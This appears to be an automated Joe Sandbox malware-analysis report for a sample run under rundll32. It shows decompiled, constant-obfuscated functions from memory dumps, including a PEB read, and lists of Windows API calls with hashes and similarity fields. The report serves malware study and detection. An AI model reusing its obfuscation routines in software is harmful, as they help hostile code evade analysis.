                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                                            • Instruction ID: f1d66d9f289ed313c332644dd66b62cab42611cfa8117df36c76826a4f1e4e6d
                                                                                                                                                            • Opcode Fuzzy Hash: e97a60f92e4476a9044cdee827ee64364931a3f318d6e648f2f6c43f9dd04637
                                                                                                                                                            • Instruction Fuzzy Hash: 6731F0B5D02358EBDF06DFA8CA4A2DEBBB1EF44315F2080D9D501A7265D7B14B98EB40
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E00379011(void* __ecx, signed int __edx) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				intOrPtr _t75;
                                                                                                                                                            				intOrPtr _t80;
                                                                                                                                                            				signed int _t88;
                                                                                                                                                            				signed int _t89;
                                                                                                                                                            
                                                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                                                            				_v44 = 0xa2b624;
                                                                                                                                                            				_v8 = 0x99eb9;
                                                                                                                                                            				_t88 = __edx;
                                                                                                                                                            				_v8 = _v8 * 0x25;
                                                                                                                                                            				_v8 = _v8 | 0x30e9a4b5;
                                                                                                                                                            				_v8 = _v8 << 5;
                                                                                                                                                            				_v8 = _v8 ^ 0x3d7f3aa0;
                                                                                                                                                            				_v24 = 0x77b72d;
                                                                                                                                                            				_v24 = _v24 << 1;
                                                                                                                                                            				_v24 = _v24 ^ 0x00e56894;
                                                                                                                                                            				_v20 = 0x2ce6cf;
                                                                                                                                                            				_v20 = _v20 >> 6;
                                                                                                                                                            				_v20 = _v20 ^ 0x000f2bb3;
                                                                                                                                                            				_v32 = 0xab4cd;
                                                                                                                                                            				_v32 = _v32 >> 0xc;
                                                                                                                                                            				_v32 = _v32 ^ 0x0007aa85;
                                                                                                                                                            				_v28 = 0x1f3eea;
                                                                                                                                                            				_v28 = _v28 >> 9;
                                                                                                                                                            				_v28 = _v28 ^ 0x0004326d;
                                                                                                                                                            				_v12 = 0xc1e4f9;
                                                                                                                                                            				_v12 = _v12 ^ 0x329f08e7;
                                                                                                                                                            				_v12 = _v12 + 0xcc91;
                                                                                                                                                            				_v12 = _v12 >> 8;
                                                                                                                                                            				_v12 = _v12 ^ 0x0038f912;
                                                                                                                                                            				_v16 = 0x3b10d4;
                                                                                                                                                            				_t89 = 0x6f;
                                                                                                                                                            				_v16 = _v16 / _t89;
                                                                                                                                                            				_v16 = _v16 + 0xffff4357;
                                                                                                                                                            				_v16 = _v16 ^ 0xf8ba2c27;
                                                                                                                                                            				_v16 = _v16 ^ 0x074e6031;
                                                                                                                                                            				_v36 = 0x1364c3;
                                                                                                                                                            				_v36 = _v36 + 0x503c;
                                                                                                                                                            				_v36 = _v36 ^ 0x001cba9a;
                                                                                                                                                            				_push(_v20);
                                                                                                                                                            				_push(_v24);
                                                                                                                                                            				_t75 = E00385BFD(_v32, _v28, _v12, E0038DCF7(_v8, __ecx, _v36));
                                                                                                                                                            				_t80 =  *0x393df8; // 0x0
                                                                                                                                                            				 *((intOrPtr*)(_t80 + 4 + _t88 * 4)) = _t75;
                                                                                                                                                            				return E0037A8B0(_v16, _t74, _v36);
                                                                                                                                                            			}

















                                                                                                                                                            0x003790df
                                                                                                                                                            0x003790e6
                                                                                                                                                            0x003790ed
                                                                                                                                                            0x003790f0
                                                                                                                                                            0x00379107
                                                                                                                                                            0x0037910c
                                                                                                                                                            0x00379117
                                                                                                                                                            0x0037912b

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 057a5cccaae675d54f9697fb23d5db618617de845d53a3d10e3c1fbf0c34f1cf
                                                                                                                                                            • Instruction ID: 2c206a3ea34462be2d5933768b81a8f38e48cd785fe91906a81d519691ed59b1
                                                                                                                                                            • Opcode Fuzzy Hash: 057a5cccaae675d54f9697fb23d5db618617de845d53a3d10e3c1fbf0c34f1cf
                                                                                                                                                            • Instruction Fuzzy Hash: B3310171D0021DEBCF09EFA5D94A4EEBBB1FF44318F208098C421B6250D7B90A58DF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00377FF2(void* __edx) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				unsigned int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				signed int _t67;
                                                                                                                                                            				void* _t73;
                                                                                                                                                            
                                                                                                                                                            				_v32 = _v32 & 0x00000000;
                                                                                                                                                            				_v40 = 0xdad9ef;
                                                                                                                                                            				_v36 = 0x9bb390;
                                                                                                                                                            				_v28 = 0x653306;
                                                                                                                                                            				_v28 = _v28 + 0xffff1628;
                                                                                                                                                            				_v28 = _v28 >> 3;
                                                                                                                                                            				_v28 = _v28 ^ 0x000c892d;
                                                                                                                                                            				_v12 = 0x5dd1e8;
                                                                                                                                                            				_v12 = _v12 ^ 0xb170c383;
                                                                                                                                                            				_v12 = _v12 | 0x2785cc64;
                                                                                                                                                            				_v12 = _v12 >> 5;
                                                                                                                                                            				_v12 = _v12 ^ 0x05b45dea;
                                                                                                                                                            				_v8 = 0x56f6d9;
                                                                                                                                                            				_v8 = _v8 + 0xc121;
                                                                                                                                                            				_t73 = __edx;
                                                                                                                                                            				_t67 = 0x41;
                                                                                                                                                            				_v8 = _v8 / _t67;
                                                                                                                                                            				_v8 = _v8 << 7;
                                                                                                                                                            				_v8 = _v8 ^ 0x00a76089;
                                                                                                                                                            				_v24 = 0xf5edfd;
                                                                                                                                                            				_v24 = _v24 | 0x2f446a90;
                                                                                                                                                            				_v24 = _v24 ^ 0x7c479bdf;
                                                                                                                                                            				_v24 = _v24 ^ 0x53b1dfb9;
                                                                                                                                                            				_v20 = 0xafa903;
                                                                                                                                                            				_v20 = _v20 + 0xffff9fdf;
                                                                                                                                                            				_v20 = _v20 ^ 0xafba618c;
                                                                                                                                                            				_v20 = _v20 ^ 0xaf136809;
                                                                                                                                                            				_v16 = 0x74f1b4;
                                                                                                                                                            				_v16 = _v16 >> 7;
                                                                                                                                                            				_v16 = _v16 | 0x7bde77db;
                                                                                                                                                            				_v16 = _v16 ^ 0x7bddce28;
                                                                                                                                                            				return E00371E22(_v28, _v24, _t73, E00371DB9(_t67), _v20, _v16);
                                                                                                                                                            			}















                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                                            • Instruction ID: dfe6b83e99878793be31394eb1876b19b88ba6c8ae26a3e65075396dd17c888f
                                                                                                                                                            • Opcode Fuzzy Hash: 880c888cbb4deb6cb63736a4bd77bb98d1251cff4ad54d84bc8c76c5b330e3fb
                                                                                                                                                            • Instruction Fuzzy Hash: 4E21EDB2C0131EEBCB58DFE5D94A4EEFBB0BB10314F208189D512B6264C3B40B898F91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E00384087() {
                                                                                                                                                            
                                                                                                                                                            				return  *[fs:0x30];
                                                                                                                                                            			}




                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                            • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                                                            • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                                                            • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                                                            • GetVersion.KERNEL32 ref: 10014EC3
                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10014EE8
                                                                                                                                                            • RegQueryValueExA.ADVAPI32 ref: 10014F0D
                                                                                                                                                            • _sscanf.LIBCMT ref: 10014F2D
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014F62
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014F68
                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10014F77
                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 10014F87
                                                                                                                                                            • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,10014522,?), ref: 10014FA2
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(?), ref: 10014FD3
                                                                                                                                                            • ConvertDefaultLocale.KERNEL32(72A4FFF6), ref: 10014FD9
                                                                                                                                                            • _memset.LIBCMT ref: 10014FF3
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                                                                                                                                                            • API String ID: 434808117-483790700
                                                                                                                                                            • Opcode ID: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                                            • Instruction ID: 7e9daad585b95ff1e899939a3d2ed629ef259dc49ac6fd8c909ded718bcfc143
                                                                                                                                                            • Opcode Fuzzy Hash: 65e42d20e5498d3f2b12d62d094999c60a842ca76fef1cc8bf600e845580613e
                                                                                                                                                            • Instruction Fuzzy Hash: A4818271D002699FDB10DFA5DD84AFEBBF9FB48341F11012AE944E7290DB789A41CB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Native), ref: 1002E138
                                                                                                                                                            • RegisterClipboardFormatA.USER32(OwnerLink), ref: 1002E141
                                                                                                                                                            • RegisterClipboardFormatA.USER32(ObjectLink), ref: 1002E14B
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Embedded Object), ref: 1002E155
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Embed Source), ref: 1002E15F
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Link Source), ref: 1002E169
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Object Descriptor), ref: 1002E173
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Link Source Descriptor), ref: 1002E17D
                                                                                                                                                            • RegisterClipboardFormatA.USER32(FileName), ref: 1002E187
                                                                                                                                                            • RegisterClipboardFormatA.USER32(FileNameW), ref: 1002E191
                                                                                                                                                            • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 1002E19B
                                                                                                                                                            • RegisterClipboardFormatA.USER32(RichEdit Text and Objects), ref: 1002E1A5
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                                                                            • String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
                                                                                                                                                            • API String ID: 1228543026-2889995556
                                                                                                                                                            • Opcode ID: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                                            • Instruction ID: dd0e5b84f65b6698509d1545b20fc89df91f0ad9f4cec7ea2b0b947e93895074
                                                                                                                                                            • Opcode Fuzzy Hash: 59400726b86d90ec70e7cae638daa4a7ba4f983a7778b7d8b23ac204cd440048
                                                                                                                                                            • Instruction Fuzzy Hash: 11013271800784AACB30EFB69C48C8BBAE4EEC5611322493EE295C7651E774D142CF88
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10030AF9,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035494
                                                                                                                                                            • __mtterm.LIBCMT ref: 100354A0
                                                                                                                                                              • Part of subcall function 10035178: __decode_pointer.LIBCMT ref: 10035189
                                                                                                                                                              • Part of subcall function 10035178: TlsFree.KERNEL32(0000001E,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100351A3
                                                                                                                                                              • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10035987
                                                                                                                                                              • Part of subcall function 10035178: DeleteCriticalSection.KERNEL32(0000001E,?,00000001,10030B95,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23), ref: 100359B1
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc,00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354B6
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354C3
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354D0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 100354DD
                                                                                                                                                            • TlsAlloc.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003552D
                                                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 10035548
                                                                                                                                                            • __init_pointers.LIBCMT ref: 10035552
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003555D
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003556D
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003557D
                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1003558D
                                                                                                                                                            • __decode_pointer.LIBCMT ref: 100355AE
                                                                                                                                                            • __calloc_crt.LIBCMT ref: 100355C7
                                                                                                                                                            • __decode_pointer.LIBCMT ref: 100355E1
                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 100355F7
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                            • API String ID: 4287529916-3819984048
                                                                                                                                                            • Opcode ID: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                                            • Instruction ID: 5f0ed48c763fc33488bdc3e5787629902cd989e4a3f8a0ff7b7d748a1094bf66
                                                                                                                                                            • Opcode Fuzzy Hash: 7b999aff3b121b0dd31d802fbd5a53390c05e299083a78b6c63fb44fd02a4d79
                                                                                                                                                            • Instruction Fuzzy Hash: 0131A0709067219EEB12DF74ADC5A593AE1FB45363F21092AE414CB1F0EB3694409FA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 1001C91F
                                                                                                                                                              • Part of subcall function 10020C26: __EH_prolog3.LIBCMT ref: 10020C2D
                                                                                                                                                            • CallNextHookEx.USER32 ref: 1001C963
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • GetClassLongA.USER32(?,000000E6), ref: 1001C9A7
                                                                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 1001C9D1
                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001CA26
                                                                                                                                                            • _memset.LIBCMT ref: 1001CA70
                                                                                                                                                            • GetClassLongA.USER32(?,000000E0), ref: 1001CAA0
                                                                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 1001CAC1
                                                                                                                                                            • GetWindowLongA.USER32(?,000000FC), ref: 1001CAE5
                                                                                                                                                            • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CAFF
                                                                                                                                                            • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001CB0A
                                                                                                                                                            • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001CB12
                                                                                                                                                            • GlobalAddAtomA.KERNEL32(AfxOldWndProc423), ref: 1001CB1A
                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001CB28
                                                                                                                                                            • CallNextHookEx.USER32 ref: 1001CB40
                                                                                                                                                            • UnhookWindowsHookEx.USER32 ref: 1001CB54
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                                            • API String ID: 867647115-4034971020
                                                                                                                                                            • Opcode ID: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                                            • Instruction ID: e0f5ce7512a5b4d1e32b812d2adba45b1a1350b75cf904612dadc9a2b629d5df
                                                                                                                                                            • Opcode Fuzzy Hash: be0f4bdd952448ef7690da40483777f37b87bc3c1912211ef9ad5859523c10f5
                                                                                                                                                            • Instruction Fuzzy Hash: A561EF7540426EAFDB11DF61CD89FAE3BB8EF09362F100154F509EA191DB34EA80CBA5
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4128688680-0
                                                                                                                                                            • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                                            • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                                                            • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                                            • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                            • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                            • API String ID: 667068680-68207542
                                                                                                                                                            • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                                            • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
